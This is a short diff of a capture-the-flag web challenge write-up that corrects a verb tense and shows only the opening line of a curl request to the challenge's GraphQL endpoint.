axjuenemann/DoD-Cyber-Sentinel-CTF---Web-Hard/writeup.md

 ---

-Now that I had the name for the mutation, one more request is required:
+Now that I have the name for the mutation, one more request is required:

 ```
 curl -X POST "http://34.86.186.68:8080/graphql" \